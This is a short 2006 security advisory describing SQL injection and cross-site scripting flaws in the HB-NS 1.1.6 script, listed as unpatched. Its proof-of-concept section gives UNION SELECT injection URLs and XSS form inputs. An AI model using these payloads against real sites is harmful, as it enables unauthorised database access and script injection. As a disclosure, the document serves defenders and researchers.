Multiple XSS and SQL Injection in HB-NS
Summary
- Vulnerability
- Multiple XSS and SQL Injection in HB-NS
- Discovered
- 2006.04.29
- Last Update
- 2006.05.09 Exploitation code published
- ID
- EV0127
- CVE
- CVE-2006-2145 CVE-2006-2146
- Risk Level
- medium
- Type
- Multiple Vulnerabilities
- Status
- Unpatched. No reply from developer(s)
- Vendor
- n/a
- Vulnerable Software
- HB-NS (http://www.haroldbakker.com/)
- Version
- 1.1.6
- PoC/Exploit
- Available
- Solution
- Not available
- Discovered by
- Aliaksandr Hartsuyeu (eVuln.com)
Description
Multiple Vulnerabilities found in HB-NS (http://www.haroldbakker.com/) script.
1. SQL Injection.
Vulnerable script: index.php
Parameters topic, id are not properly sanitized before being used in SQL query. This can be used to make any SQL query by injecting arbitrary SQL code.
Condition: magic_quotes_gpc = off
2. Cross-Site Scripting.
Vulnerable Script: index.php
Parameters poster_name, poster_email, poster_homepage, message are not properly sanitized. This can be used to post arbitrary HTML or web script code.
PoC/Exploit
1. SQL Injection Example.
URL: http://[host]/index.php?action=topic&topic=zzzz'%20union%20select%201,2,3,4,5,6/*
URL: http://[host]/index.php?action=list&id=999'%20union%20select%201,2,3,4,5/*
2. Cross-Site Scripting Example.
URL: http://[host]/index.php?action=comment&id=1#comments
Your name (required): [XSS]
Your email: ">[XSS]<"
Your homepage: javascript:alert(1)
Comments (required): [XSS]
Solution.
Solution for "Multiple XSS and SQL Injection in HB-NS" is not available. Check vendor's website for updates.